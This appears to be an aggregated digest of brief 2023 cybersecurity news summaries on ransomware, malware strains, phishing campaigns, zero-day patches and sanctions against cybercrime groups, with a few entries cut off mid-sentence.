Akamai researchers recently discovered a high-severity vulnerability in Kubernetes tracked as CVE-2023-3676 (CVSS 8.8). This identification of this issue led to the discovery of two more vulnerabilities tracked as CVE-2023-3893, and CVE-2023-3955 (CVSS 8.8). All three vulnerabilities were caused by insecure function call and the lack of user input sanitization.

MetaStealer Malware is Targeting Enterprise macOS Users

A new strain of macOS malware is targeting enterprise users, as indicated by file names and content. Some versions of this malware, called MetaStealer, masquerade as Adobe files, while others use deceptive methods like password-protected ZIP files sent by fake clients. Once opened, these files reveal an app disguised as a PDF.

Ransomware Access Broker Steals Accounts via Microsoft Teams Phishing

Microsoft has reported a change in tactics by an initial access broker, previously associated with ransomware groups. This actor, identified as Storm-0324, has shifted its focus to Microsoft Teams phishing attacks as a means to infiltrate corporate networks. Storm-0324 is a financially motivated threat group with a history of deploying ransomware such as Sage and GandCrab in previous campaigns.

Rust-Written 3AM Ransomware: A Sneak Peek into a New Malware Family

A new ransomware family called 3AM has emerged in the wild after it was detected in a single incident in which an unidentified affiliate deployed the strain following an unsuccessful attempt to deliver LockBit (attributed to Bitwise Spider or Syrphid) in the target network. 3AM gets its name from the fact that it's referenced in the ransom note. It also appends encrypted files with the extension .threeamtime.

Microsoft September 2023 Patch Tuesday Fixes 2 Zero-Days, 59 Flaws

As part of the September Patch Tuesday, Microsoft addressed 59 flaws, including two zero-days that were exploited in attacks in the wild. In total, Microsoft released fixes for 3 Security Feature Bypass Vulnerabilities, 24 Remote Code Execution Vulnerabilities, 9 Information Disclosure Vulnerabilities, 3 Denial of Service Vulnerabilities, 5 Spoofing Vulnerabilities, and 5 Edge - Chromium Vulnerabilities.

Facebook Messenger Phishing Wave Targets 100K Business Accounts Per Week

Hackers use a massive network of fake and compromised Facebook accounts to send out millions of Messenger phishing messages to target Facebook business accounts with password-stealing malware. The attackers trick the targets into downloading a RAR/ZIP archive containing a downloader for an evasive Python-based stealer that grabs cookies and passwords stored in the victim's browser.

Google Fixes Another Chrome Zero-Day Bug Exploited in Attacks

Yesterday, Google released security updates to fix a critical zero-vulnerability in its Chrome web browser. Tracked as CVE-2023-4863, the flaw relates to a heap-based buffer overflow in the WebP image format. Successful exploitation of this issue could result in browser crashes or arbitrary code execution.

Cuba Ransomware Group Unleashes Undetectable Malware

Security researchers at Kaspersky have exposed the activities of the infamous ransomware group Cuba. In a recent advisory, Kaspersky revealed that this cyber-criminal gang has been targeting organizations across different industries worldwide. In December 2022, Kaspersky detected a suspicious incident on a client's system, which led to the discovery of three mysterious files triggering the komar65 library, also known as BUGHATCH.

Apple Backports BLASTPASS Zero-Day Fix to Older iPhones

Apple released security updates for older iPhones to fix a zero-day vulnerability tracked as CVE-2023-41064 that was actively exploited to infect iOS devices with NSO's Pegasus spyware. CVE-2023-31064 is a remote code execution flaw that is exploited by sending maliciously crafted images via iMessage.

'Redfly' Hackers Infiltrated Power Supplier's Network for 6 Months

An espionage threat group tracked as 'Redfly' hacked a national electricity grid organization in Asia and quietly maintained access to the breached network for six months. These new findings come from Symantec, who found evidence of ShadowPad malware activity in the organization's network between February 28 and August 3, 2023, along with keyloggers and specialized file launchers.

Microsoft Teams Phishing Attack Pushes Darkgate Malware

A recent phishing scheme has exploited Microsoft Teams messages as a means to distribute harmful attachments that deploy the DarkGate Loader malware. This campaign commenced in late August 2023, as phishing messages originating from two compromised external Office 365 accounts were observed, targeting various organizations. These accounts were employed to deceive Microsoft Teams users into downloading and launching a ZIP file titled "Alterations to the holiday calendar."

'Evil Telegram' Android apps on Google Play infected 60K with spyware

Several malicious Telegram clones for Android on Google Play were installed over 60,000 times, infecting people with spyware that steals user messages, contacts lists, and other data. The apps appear to be tailored for Chinese-speaking users and the Uighur ethnic minority, suggesting possible ties to the well-documented state monitoring and repression mechanisms. The apps were discovered by Kaspersky, who reported them to Google.

Ragnar Locker Claims Attack on Israel's Mayanei Hayeshua Hospital

The Ragnar Locker ransomware gang has claimed responsibility for an attack on Israel's Mayanei Hayeshua hospital, threatening to leak 1 TB of data allegedly stolen during the cyberattack. The cyberattack on Mayanei Hayeshua occurred in early August, disrupting the hospital's record-keeping system and preventing new patients from receiving care.

Ransomware Attack Wipes Out Four Months of Sri Lankan Government Data

Sri Lanka's government cloud system, Lanka Government Cloud (LGC), has fallen victim to a massive ransomware attack that began on August 26, 2023. The attack resulted in the encryption of LGC services and backup systems, affecting approximately 5,000 email addresses using the "gov[dot]lk" domain, including those of the Cabinet Office.

UK and US Sanction 11 Members of the Russia-Based TrickBot Gang

The United States, in coordination with the United Kingdom, sanctioned eleven more individuals who are members of the Russia-based Trickbot cybercrime group. The sanctions were provided by the U.S. Department of the Treasury’s Office of Foreign Assets Control. The sanctioned TrickBot members worked as administrators, managers, developers, and coders, who have materially supported the operations of the group. The group has been tied to Russian intelligence services and has targeted the U.S. government, companies and hospitals.

Mac Users Beware: Malvertising Campaign Spreads Atomic Stealer macOS Malware

A new malvertising campaign has been observed distributing an updated version of a macOS stealer malware called Atomic Stealer (or AMOS), indicating that it's being actively maintained by its author. An off-the-shelf Golang malware available for $1,000 per month, Atomic Stealer first came to light in April 2023. Shortly after that, new variants with an expanded set of information-gathering features were detected in the wild, targeting gamers and cryptocurrency users.

Apple Discloses 2 New Zero-Days Exploited to Attack iPhones, Macs

Yesterday, Apple issued emergency security updates to address two zero-day flaws that were exploited in attacks targeting iPhone and Mac users. The vulnerabilities are being tracked as CVE-2023-41064 (discovered by Citizen Lab security researchers) and CVE-2023-41061 (discovered by Apple) and were found in the Image I/O and Wallet frameworks. CVE-2023-41064 relates to a validation issue in Wallet which can be exploite

Attackers Leverage Windows Advanced Installer to Drop Cryptocurrency Malware

Attackers operating from IP addresses in France, Luxembourg, and Germany have been utilizing the legitimate Windows tool, Advanced Installer, to create software packages that deliver cryptocurrency mining malware onto computers in various sectors. The malware payloads, as reported by Cisco Talos researchers on September 7, include the M3_Mini_RAT client stub. This remote access trojan enables the attackers to establish backdoors, download, and execute additional threats, including PhoenixMiner for Ethereum cryptocurrency mining and IOIMiner, a multi-coin mining threat.

Mirai Variant Infects Low-Cost Android TV Boxes for DDoS attacks

A variant of the Mirai malware botnet has been observed infecting affordable Android TV set-top boxes that are widely used for media streaming by millions of users. Dr. Web's antivirus team reports that this trojan represents a fresh iteration of the 'Pandora' backdoor, initially seen in 2015. The primary focus of this campaign is on economical Android TV boxes such as the Tanix TX6 TV Box, MX10 Pro 6K, and H96 MAX X3.

September Android updates Fix Zero-Day Exploited in Attacks

As part of the September 2023 Android security updates, Google addressed 33 vulnerabilities, including a high-severity zero-day that is actively being exploited in the wild. Tracked as CVE-2023-35674, the zero-day flaw impacts the Android Framework and could allow threat actors to escalate privileges on vulnerable devices without requiring user interaction or additional execution privileges

US and UK Sanction 11 TrickBot and Conti Cybercrime Gang Members

The USA and the United Kingdom have sanctioned eleven Russian nationals associated with the TrickBot and Conti ransomware cybercrime operations. The TrickBot malware operation launched in 2015 and focused on stealing banking credentials. However, over time, it developed into a modular malware that provided initial access to corporate networks for other cybercrime operations, such as Ryuk and, later, Conti ransomware operations.

China, North Korea Pursue New Targets While Honing Cyber Capabilities

China has developed a new capability using artificial intelligence to automatically generate images for influence operations in the United States and other democracies. These images aim to mimic U.S. voters across the political spectrum and create controversy along racial, economic, and ideological lines. Microsoft's Threat Analysis Center (MTAC) has observed China-affiliated actors using AI-generated visual media in campaigns that focus on politically divisive topics and denigrate U.S. political figures and symbols.

New Python Variant of Chaes Malware Targets Banking and Logistics Industries

Banking and logistics industries are under the onslaught of a reworked variant of a malware called Chaes. ‘It has undergone major overhauls: from being rewritten entirely in Python, which resulted in lower detection rates by traditional defense systems, to a comprehensive redesign and an enhanced communication protocol,’ Morphisec said in a new detailed technical write-up shared with The Hacker News.

New BLISTER Malware Update Fueling Stealthy Network Infiltration Summary:

An updated version of a malware loader known as BLISTER is being used as part of SocGholish infection chains to distribute an open-source command-and-control (C2) framework called Mythic. ‘New BLISTER update includes keying feature that allows for precise targeting of victim networks and lowers exposure within VM/sandbox environments,’ Elastic Security Labs researchers Salim Bitam and Daniel Stepanic said in a technical report published late last month.

W3ll Phishing Kit Hijacks Thousands of Microsoft 365 Accounts, Bypasses MFA

An entity identified as W3LL created a phishing toolkit capable of evading multi-factor authentication and employed various tools to compromise over 8,000 corporate Microsoft 365 accounts. Over the course of ten months, security experts detected the utilization of W3LL's resources and infrastructure in the establishment of approximately 850 phishing campaigns, targeting login credentials for more than 56,000 Microsoft 365 accounts.

Smishing Triad Targeted USPS and US Citizens for Data Theft

The "Smishing Triad" cybercriminal group, believed to be Chinese-speaking, has been targeting individuals worldwide through a package tracking text scam sent via iMessage. Impersonating various postal services and government agencies, including the Royal Mail, New Zealand Postal Service, Correos, Postnord, Poste Italiane, and the Italian Revenue Service, the group aims to collect personal and payment information for identity theft and credit card fraud.

APT28 Cyberattack: Msedge as a Bootloader, TOR, and Mockbin[.]org/Website[.]hook Services as a Control Center

The government computer emergency response team of Ukraine, CERT-UA, recorded a targeted cyber attack against a critical energy infrastructure facility in Ukraine. To implement the malicious plan, an e-mail message with a fake sender address and a link to an archive, for example, "photo.zip", was distributed. Visiting the link will download a ZIP archive containing three JPG images (decoys) and a BAT file "weblinks.cmd" to the victim's computer.

MITRE and CISA Release OT Attack Emulation Tool

A new open source tool designed to emulate cyber-attacks against operational technology (OT) has been released by MITRE and the US Cybersecurity and Infrastructure Security Agency (CISA). The MITRE Calder for OT is now publicly available as an extension to the open-source Caldera platform on GitHub.

Exploit released for critical VMware SSH auth bypass vulnerability

Summoning Team’s Sina Kheirkhah recently published a proof-of-concept exploit code for a critical SSH authentication bypass vulnerability in VMware’s Aria Operations for Networks analysis tool. Tracked as CVE-2023-34039, the vulnerability can be exploited by remote attackers to bypass SSH authentication on unpatched appliances and access the tool’s command line interface.

German financial agency site disrupted by DDoS attack since Friday

The German Federal Financial Supervisory Authority (BaFin) announced today that an ongoing distributed denial-of-service (DDoS) attack has been impacting its website since Friday. BaFin is Germany’s financial regulatory authority, part of the Federal Ministry of Finance, responsible for supervising 2,700 banks, 800 financial, and 700 insurance service providers.

Hackers Exploit MinIO Storage System to Breach Corporate Networks

Two recent vulnerabilities in MinIO have been exploited by threat actors to breach object storage systems. This access allows the actors to view private information, execute arbitrary code, and potentially take over servers. MinIO is a open-source storage service that is compatible with various cloud containers including Amazon S3.

Okta: Hackers Target IT Help Desks to Gain Super Admin, Disable MFA

Researchers at Okta issued a warning regarding social engineering attacks directed at IT service desk agents serving U.S.-based clients. The aim of these attacks was to deceive these agents into resetting multi-factor authentication (MFA) for users with elevated privileges. The attackers' ultimate objective was to gain control of Okta Super Administrator accounts, which have extensive privileges. This access would enable them to exploit identity federation functionalities, permitting impersonation of users within the compromised organization.

North Korean Hackers Behind Malicious VMConnect PyPI Campaign

North Korean state-sponsored hackers are behind the VMConnect campaign that uploaded to the PyPI (Python Package Index) repository malicious packages, one of them mimicking the VMware vSphere connector module vConnector. The packages were uploaded at the beginning of August, with one named VMConnect targeting IT professionals seeking virtualization tools.

WordPress Migration Add-on Flaw Could Lead to Data Breaches

Researchers found a vulnerability in the widely-used plugin, All-in-One WP Migration, employed for migrating WordPress sites, and having an active user base of 5 million. This vulnerability involves unauthorized manipulation of access tokens, potentially granting attackers access to sensitive site data. All-in-One WP Migration is a user-friendly tool tailored for WordPress site migration.

Paramount Discloses Data Breach Following Security Incident

American entertainment giant Paramount Global disclosed a data breach after its systems got hacked and attackers gained access to personally identifiable information (PII). Paramount said in breach notification letters signed by Nickelodeon Animation Studio EVP Brian Keane sent to affected individuals that the attackers had access to its systems between May and June 2023.

Cisco VPNs with No MFA Enabled Hit by Ransomware Groups

Since March 2023 (and possibly even earlier), affiliates of the Akira and LockBit ransomware operators have been breaching organizations via Cisco ASA SSL VPN appliances, “In some cases, adversaries have conducted credential stuffing attacks that leveraged weak or default passwords; in others, the activity we’ve observed appears to be the result of targeted brute-force attacks on ASA appliances where multi-factor authentication (MFA) was either not enabled or was not enforced for all users (i.e., via MFA bypass groups),” Rapid7 researchers said on Tuesday.

How to Prevent ChatGPT From Stealing Your Content & Traffic

ChatGPT and similar large language models (LLMs) have added further complexity to the ever-growing online threat landscape. Cybercriminals no longer need advanced coding skills to execute fraud and other damaging attacks against online businesses and customers, thanks to bots-as-a-service, residential proxies, CAPTCHA farms, and other easily accessible tools.

Easy-to-Exploit Skype Vulnerability Reveals Users’ IP Address

A vulnerability in Skype mobile apps can be exploited by attackers to discover a user’s IP address – a piece of information that may endanger individuals whose physical security depends on their general location remaining secret. The security vulnerability has been discovered by a security researcher named Yossi, who privately reported it to Microsoft and demonstrated its effective exploitation to journalist Joseph Cox.

Spain Warns of LockBit Locker Ransomware Phishing Attacks

The Spanish National Police has issued an alert about an active ransomware campaign known as 'LockBit Locker,' which is currently targeting architecture firms in the country using phishing emails. According to the translated police statement, a series of emails have been identified as being sent to architecture companies.

Four in Five Cyber-Attacks Powered by Just Three Malware Loaders

Researchers from ReliaQuest found that cybercriminals relied primarily on seven different malware loaders to carry out attacks in the first half of 2023. QakBot, SocGholish, and Raspberry Robin were the most commonly used loaders, accounting for roughly 80% of all intrusions. GootLoader, ChromeLoader, Guloader, and Ursnif were also commonly seen.

MalDoc in PDFs: Hiding Malicious Word Docs in PDF Files

Japan's computer emergency response team (JPCERT) is sharing a new 'MalDoc in PDF' attack detected in July 2023 that bypasses detection by embedding malicious Word files into PDFs. The file sampled by JPCERT is a polyglot recognized by most scanning engines and tools as a PDF, yet office applications can open it as a regular Word document (.doc). Polyglots are files that contain two distinct file formats that can be interpreted and executed as more than one file type, depending on the application reading/opening them.

Microsoft: Stealthy Flax Typhoon Hackers Use Lolbins to Evade Detection

Microsoft has detected a new hacking collective referred to as Flax Typhoon. This group focuses on government bodies, educational institutions, vital manufacturing units, and IT organizations, presumably with the aim of espionage. The attackers avoid heavy usage of malware for infiltrating and controlling victim networks. Instead, they opt for utilizing existing components within the operating system, often referred to as living-off-the-land binaries (LOLBins), along with legitimate software.

KmsdBot Malware Gets an Upgrade: Now Targets IoT Devices with Enhanced Capabilities

An updated version of a botnet malware called KmsdBot is now targeting Internet of Things (IoT) devices, simultaneously branching out its capabilities and the attack surface. ‘The binary now includes support for Telnet scanning and support for more CPU architectures,’ Akamai security researcher Larry W. Cashdollar said in an analysis published this month. The latest iteration, observed since July 16, 2023, comes months after it emerged that the botnet is being offered as a DDoS-for-hire service to other threat actors.

Rhysida Claims Ransomware Attack On Prospect Medical, Threatens to Sell Data

The Rhysida ransomware group recently claimed responsibility for a cyberattack targeting Prospect Medical Holdings, a US healthcare company operating 16 hospitals in California, Connecticut, Pennsylvania, and Rhode Island and a network of 166 outpatient clinics and centers. The attack allegedly took place on August 3rd, with employees finding ransom notes on their systems stating that their network was hacked and devices had been encrypted. Due to the attack, the hospitals were forced to shut down their IT networks to mitigate the impact, causing employees to use paper charts.

Poland’s Authorities Investigate a Hacking Attack on Country’s Railways

Poland's Internal Security Agency (ABW) and national police are investigating a hacking attack on the country's state railway network. The attack disrupted railway traffic overnight and triggered an emergency status that stopped trains near the city of Szczecin. The attack is suspected to be part of broader destabilization efforts by Russia, possibly in conjunction with Belarus.

New Study Sheds Light on Adhubllka Ransomware Network

Cybersecurity experts have revealed an intricate network of interconnected ransomware types that all stem from a shared origin: the Adhubllka ransomware group. Netenrich, a cybersecurity firm, conducted a study exploring the lineage of various ransomware versions, such as LOLKEK, BIT, OBZ, U2K, and TZW. The researchers discovered significant resemblances in code, tactics, and infrastructure among these apparently distinct ransomware types. By tracking the evolution of these variants, the experts established a genealogical link connecting them to the original Adhubllka ransomware, which emerged in January 2020.

New Telegram Bot "Telekopye" Powering Large-scale Phishing Scams from Russia

A new financially motivated operation is leveraging a malicious Telegram bot to help threat actors scam their victims. Dubbed Telekopye, a portmanteau of Telegram and kopye (meaning "spear" in Russian), the toolkit functions as an automated means to create a phishing web page from a premade template and send the URL to potential victims, codenamed Mammoths by the criminals.

Jupiter X Core WordPress plugin could let hackers hijack sites

WordPress security company Patchstack discovered two critical vulnerabilities affecting Jupiter X Core, a premium visual editor plugin for setting up Wordpress and WooCommerce websites. The first flaw tracked as CVE-2023-38388, allows unauthenticated threat actors to upload files, which could lead to arbitrary code execution on the server.

Whiffy Recon Malware: New Threat Analysis and Insights

Researchers from Secureworks Counter Threat Unit (CTU) have identified a new Wi-Fi scanning malware named Whiffy Recon, which has been dropped by the Smoke Loader botnet. This malicious code employs nearby Wi-Fi access points as reference points for Google's geolocation API to triangulate the positions of infected systems.

Ransomware Hackers' Dwell Time Drops to 5 Days, RDP Still Widely Used

Ransomware threat actors are reducing the time they spend within compromised networks before being detected by security solutions. In the first half of this year, the median dwell time for these hackers decreased to five days from nine days in 2022. However, the overall median dwell time for all cyberattacks dropped to eight days from ten in 2022, indicating a general trend of quicker detection. Ransomware attacks constituted nearly 69% of all recorded cyberattacks during this period.

FBI Identifies Wallets Holding Cryptocurrency Funds Stolen by North Korea Summary:

The FBI in the United States issued a cautionary notice regarding the potential efforts of threat actors associated with North Korea to convert pilfered cryptocurrency, totaling over $40 million in value. In a disclosure, the Federal Bureau of Investigation outlined the actions of six cryptocurrency wallets operated by entities connected to North Korea. These wallets possess approximately 1,580 Bitcoin, equivalent to around $41 million based on current valuations. Authorities suspect these funds are connected to the recent heist of a substantial sum of cryptocurrency, amounting to hundreds of millions of dollars.

Russian Toolkit Aims to Make Online Scamming Easy for Anyone

A toolkit possibly developed by Russian individuals, known as Telekopye to security experts, aims to let fraudsters focus on refining their social engineering skills, freeing them from the technical aspects of online scams. Eset researchers uncovered a tool they named Telekopye, derived from the combination of "Telegram" and "kopye," the Russian word for spear.

Over 3,000 Openfire Servers Vulnerable to Takover Attacks

Thousands of Openfire servers remain vulnerable to CVE-2023-32315, an actively exploited and path traversal vulnerability that allows an unauthenticated user to create new admin accounts. Openfire is a widely used Java-based open-source chat (XMPP) server downloaded 9 million times. On May 23, 2023, it was disclosed that the software was impacted by an authentication bypass issue that affected version 3.10.0, released in April 2015, until that point.

Hosting Firm Says it Lost All Customer Data After Ransomware Attack

Danish hosting firms CloudNordic and AzeroCloud recently disclosed that they suffered from a ransomware attack, causing the firms to lose a majority of customer data and shut down all systems, including websites, emails, and customer sites. Since the attack took place last Friday, IT teams have only managed to restore some of the servers without any data, with CloudNordic stating that the restoration process isn’t going smoothly and that many of their customers’ data seems irrecoverable.

FBI: Patches for Recent Barracuda ESG Zero-Day Ineffective

The Barracuda Email Security Gateway (ESG) vulnerability, identified as CVE-2023-2868, has been exploited by a Chinese state-sponsored cyberespionage group named UNC4841. This vulnerability affects Barracuda ESG versions 5.1.3.001 to 9.2.0.006, enabling attackers to perform command injections via specially crafted TAR file attachments in emails. Despite Barracuda's patch release in May 2023, the FBI has found that the patches are ineffective, and the vulnerability remains actively exploited.

A North Korean State-Backed Hacking Group Leveraged Zoho's ManageEngine ServiceDesk for Compromrise

The North Korean state-backed hacker group Lazarus has been exploiting a critical vulnerability (CVE-2022-47966) in Zoho's ManageEngine ServiceDesk software to compromise an internet backbone infrastructure provider and healthcare organizations. This campaign began in early 2023, targeting entities in the U.S. and U.K. The attackers employed the QuiteRAT malware and a newly identified remote access trojan (RAT) named CollectionRAT. The latter was discovered through the analysis of the group's infrastructure.

Scarab Ransomware Deployed Worldwide Via Spacecolon Toolset

ESET researchers found the Spacecolon toolkit spreading Scarab ransomware across global organizations. It exploits weak web servers or RDP credentials for entry, with Turkish elements hinting at a Turkish-speaking developer. Spacecolon dates back to May 2020, with ongoing campaigns and a recent May 2023 build. ESET hasn’t linked it to any known group naming it “CosmicBeetle”.

Akira Ransomware Targets Cisco VPNs to Breach Organizations Summary:

There's mounting evidence that Akira ransomware targets Cisco VPN (virtual private network) products as an attack vector to breach corporate networks, steal, and eventually encrypt data. Akira ransomware is a relatively new ransomware operation launched in March 2023, with the group later adding a Linux encryptor to target VMware ESXi virtual machines.

WinRAR Zero-Day Exploited Since April to Hack Trading Accounts

According to Group-IB a WInRaR zero-day vulnerability was actively exploited to install malware when clicking on harmless files in an archive, allowing hackers to breach online cryptocurrency trading accounts. Tracked as CVE-2023-38831, the vulnerability is triggered by creating specially crafted archives with a slightly modified structure compared to safe files, which causes WinRAR's ShellExecute function to receive an incorrect parameter when it attempts to open the decoy file.

Scraped data of 2.6 million Duolingo users released on hacking forum

The scraped data of 2.6 million DuoLingo users was leaked on a hacking forum, allowing threat actors to conduct targeted phishing attacks using the exposed information. Duolingo is one of the largest language learning sites in the world, with over 74 million monthly users worldwide. In January 2023, someone was selling the scraped data of 2.6 million DuoLingo users on the now-shutdown Breached hacking forum for $1,500. This data includes a mixture of public login and real names, and non-public information, including email addresses and internal information related to the DuoLingo service.

Ivanti Warns of New Actively Exploited MobileIron Zero-Day Bug

US based software company Ivanti has issued a warning to its customers about an ongoing exploitation of a critical Sentry API authentication bypass vulnerability. The vulnerability affects Ivanti Sentry, which serves as a gatekeeper for enterprise ActiveSync and Sharepoint servers, as well as a Kerberos Key Distribution Center Proxy server. The cybersecurity firm Mnemonic discovered the vulnerability (CVE-2023-38035), allowing unauthorized attackers to access sensitive admin portal configuration APIs through port 8443 used by Mobile Iron Configuration Service (MICS).

Carderbee Hacking Group Hits Hong Kong Orgs in Supply Chain Attack

An undisclosed Advanced Persistent Threat (APT) hacking collective known as 'Carderbee' has been detected launching assaults on various institutions situated in Hong Kong and other parts of Asia. This group employs authentic software to infiltrate victims' machines with the PlugX malware. According to findings from Symantec, the legitimate software involved in this supply chain breach is Cobra DocGuard, designed by the Chinese developer 'EsafeNet.' This software is typically employed in security applications for tasks like data encryption and decryption.

Sneaky Amazon Google ad leads to Microsoft support scam

A legitimate-looking ad for Amazon in Google search results redirects visitors to a Microsoft Defender tech support scam that locks up their browser. Today, BleepingComputer was alerted to what appeared to be a valid advertisement for Amazon in the Google search results. The advertisement shows Amazon's legitimate URL, just like in the company's typical search result.

New Variant of XLoader macOS Malware Disguised as 'OfficeNote' Productivity App

A new variant of an Apple macOS malware called XLoader has surfaced in the wild, masquerading its malicious features under the guise of an office productivity app called ‘OfficeNote.’ ‘The new version of XLoader is bundled inside a standard Apple disk image with the name OfficeNote.dmg, SentinelOne security researchers Dinesh Devadoss and Phil Stokes said in a Monday analysis.

Cuba Ransomware Uses Veeam Exploit Against Critical U.S. Organizations

The Cuba ransomware group has been observed launching attacks against critical infrastructure organizations in the US and IT firms in Latin America. They utilize a mix of both old and new tools. In early June 2023, Blackberry’s Threat Research and Intelligence Team identified this recent campaign. They have noted that Cuba now uses CVE-2023-27543 to extract credentials from configuration files.

HiatusRAT Malware Resurfaces: Taiwan Firms and U.S. Military Under Attack

The threat actors behind the HiatusRAT malware have returned from their hiatus with a new wave of reconnaissance and targeting activity aimed at Taiwan-based organizations and a U.S. military procurement system. Besides recompiling malware samples for different architectures, the artifacts are said to have been hosted on new virtual private servers (VPSs), Lumen Black Lotus Labs said in a report published last week.

Interpol Arrests 14 Suspected Cybercriminals For Stealing $40 Million

An international law enforcement operation led by Interpol has led to the arrest of 14 suspected cybercriminals in an operation codenamed 'Africa Cyber Surge II,' launched in April 2023. The four-month operation spanned 25 African countries and disrupted over 20,000 cybercrime networks engaged in extortion, phishing, BEC, and online scams, responsible for financial losses of over $40,000,000.

Alarming Lack of Cybersecurity Practices on World’s Most Popular Websites

The Cybernews research team delved into an often overlooked aspect of website security—HTTP security headers. These headers guide browsers in interacting with web pages, defending against cyber threats. They studied the top 100 sites, including Pinterest, IMDB, and Facebook. Results revealed many popular websites lacking crucial security measures, raising concerns for both site owners and users.

Google Chrome's New Feature Alerts Users About Auto-Removal of Malicious Extensions

Google has announced plans to add a new feature in the upcoming version of its Chrome web browser to alert users when an extension they have installed has been removed from the Chrome Web Store. The feature, set for release alongside Chrome 117, allows users to be notified when an add-on has been unpublished by a developer, taken down for violating Chrome Web Store policy, or marked as malware.

New Wave of Attack Campaign Targeting Zimbra Email Users for Credential Theft

A new "mass-spreading" social engineering campaign is targeting users of the Zimbra Collaboration email server with an aim to collect their login credentials for use in follow-on operations. The activity, active since April 2023 and still ongoing, targets a wide range of small and medium businesses and governmental entities, most of which are located in Poland, Ecuador, Mexico, Italy, and Russia.

Monti Ransomware Targets VMware ESXi Servers With New Linux Locker

The Monti ransomware gang has returned, after a two-month break from publishing victims on their data leak site, using a new Linux locker to target VMware ESXi servers, legal, and government organizations. Researchers at Trend Micro analyzing the new encryption tool from Monti found that it has ‘significant deviations from its other Linux-based predecessors.

Credentials for Cybercrime Forums Found on Roughly 120K Computers Infected with Info Stealers

Hudson Rock, a threat intelligence firm, uncovered cybercrime forum credentials on about 120,000 computers infected with various info-stealer malware. These compromised computers, spanning from 2018 to 2023, were largely owned by threat actors themselves. The analysis of over 14.5 million infected computers revealed hackers' identities through additional credentials, autofill data, and system info.

Almost 2,000 Citrix NetScaler servers backdoored in hacking campaign

As part of a joint effort with Dutch Institute of Vulnerability Disclosure (DIVD), researchers at cybersecurity company Fox-IT (NCC Group) have uncovered a large-scale campaign that planted webshells on Citrix Netscaler servers vulnerable to CVE-2023-3519, a critical remote code execution flaw that was patched on July 18. By scanning the internet, they uncovered 2491 webshells across 1952 distinct NetScaler servers, which made up 6% of all Netscalers (31,127) vulnerable to CVE-2023-3519, on a global scale, as of July 21, 2023.

Major U.S. Energy Org Targeted in QR Code Phishing Attack

A phishing campaign was observed predominantly targeting a notable energy company in the US, employing QR codes to slip malicious emails into inboxes and bypass security. Roughly one-third (29%) of the 1,000 emails attributed to this campaign targeted a large US energy company, while the remaining attempts were made against firms in manufacturing (15%), insurance (9%), technology (7%), and financial services (6%). According to Cofense, who spotted this campaign, this is the first time that QR codes have been used at this scale, indicating that more phishing actors may be testing their effectiveness as an attack vector.

LinkedIn Accounts Hacked in Widespread Hijacking Campaign

Linkedin is facing a surge of account breaches, leading to numerous accounts being either locked for security concerns or seized by malicious actors. According to a recent report from Cyberint, numerous LinkedIn users have expressed frustration over compromised accounts or access issues, with attempts to address these problems through LinkedIn support. Although, LinkedIn’s support response time has lengthened, no official statement has been made yet.

File Sharing Site Anonfiles Shuts Down Due to Overwhelming Abuse

Anonfiles, a popular service for sharing files anonymously, has shut down after saying it can no longer deal with the overwhelming abuse by its users. Anonfiles is an anonymous file-sharing site that allows people to share files anonymously without their activity being logged. However, it soon became one of the most popular file-sharing services used by threat actors to share samples of stolen data, stolen credentials, and copyrighted material. F

Cleaning Products Manufacturer Clorox Company Took Some Systems Offline After a Cyberattack

The Clorox Company, a prominent multinational consumer goods firm known for its household and professional cleaning, health, and personal care products, recently faced a cybersecurity breach that compelled them to take specific systems offline. Detecting unauthorized activity on their Information Technology (IT) systems, Clorox swiftly initiated measures to halt and rectify the situation, including offline system shutdowns, as stated in an 8-K filing.

Raccoon Stealer Malware Returns With New Stealthier Version

The resurgence of the Raccoon Stealer malware is marked by the release of version 2.3.0 after a 6-month hiatus. Raccoon Stealer is a well-known information-stealing malware that has been active since 2019, offered to threat actors through a subscription model at $200 per month. The malware targets over 60 applications to collect sensitive data such as login credentials, credit card details, browsing history, cookies, and cryptocurrency wallets.

Massive 400,000 Proxy Botnet Built With Stealthy Malware Infections

Researchers have discovered a widespread operation that distributed proxy server applications to over 400,000 Windows systems. These devices function as residential exit nodes without obtaining users’ permission, and a company is making money by charging for the proxy traffic that passes through these machines. Threat actors find residential proxies useful for carrying out extensive credential stuffing attacks using new IP addresses.

QwixxRAT: A New Windows RAT Emerges in the Threat Landscape

The Uptycs Threat Research team discovered the QwixxRAT (aka Telegram RAT) in early August 2023 while it was advertised through Telegram and Discord platforms. According to the experts, QwixxRAT is meticulously designed to steal a broad range of information, including data from browser histories, credit card details, screenshots, and keystrokes.

Multiple Flaws Uncovered in Data Center Systems

Multiple vulnerabilities have been discovered in data center power management systems and supply technologies, enabling unauthorized access and remote code injection by threat actors. These vulnerabilities can be exploited to gain full access to data center systems, perform remote code injection, and create backdoors, potentially compromising connected devices and the broader network. The vulnerabilities were found in CyberPower's PowerPanel Enterprise Data Center Infrastructure Management platform and Dataprobe's iBoot Power Distribution Unit.

Threat Actors Use Beta Apps to Bypass Mobile App Store Security

The FBI has raised an alert about a new strategy employed by cybercriminals. They are now pushing harmful “beta” editions of cryptocurrency investment applications on widely used mobile app stores. These apps are subsequently exploited to pilfer cryptocurrency. The perpetrators introduce these harmful apps to the mobile app stores under the guise of “beta” versions.

Ongoing Xurum Attacks on E-commerce Sites Exploiting Critical Magento 2 Vulnerability

E-commerce sites using Adobe's Magento 2 software are the target of an ongoing campaign that has been active since at least January 2023. The attacks, dubbed Xurum by Akamai, leverage a now-patched critical security flaw (CVE-2022-24086, CVSS score: 9.8) in Adobe Commerce and Magento Open Source that, if successfully exploited, could lead to arbitrary code execution. ‘The attacker seems to be interested in payment stats from the orders in the victim's Magento store placed in the past 10 days,’ Akamai researchers said in an analysis published last week, attributing the campaign to actors of Russian origin.

Almost All VPNs Are Vulnerable to Traffic-Leaking TunnelCrack Attacks

Researchers from New York University, New York University Abu Dhabi, and KU Leuven University have discovered several vulnerabilities affecting most VPN products that can be exploited by attackers to read user traffic, steal user information, or attack user devices. The attacks, known as TunnelCrack attacks, are independent of the VPN protocol being used and can reveal which websites a user is visiting, posing a significant privacy risk even if the user is using additional encryption such as HTTPS.

MaginotDNS Attacks Exploit Weak Checks for DNS Cache Poisoning

Researchers from UC Irvine and Tsinghua University have introduced a cache poisoning attack named 'MaginotDNS' that targets Conditional DNS (CDNS) resolvers, potentially compromising entire top-level domains (TLDs). This attack capitalizes on security inconsistencies in various DNS software and server modes, rendering around one-third of CDNS servers vulnerable.

Count of Organizations Affected by MOVEit Attacks Hits 637

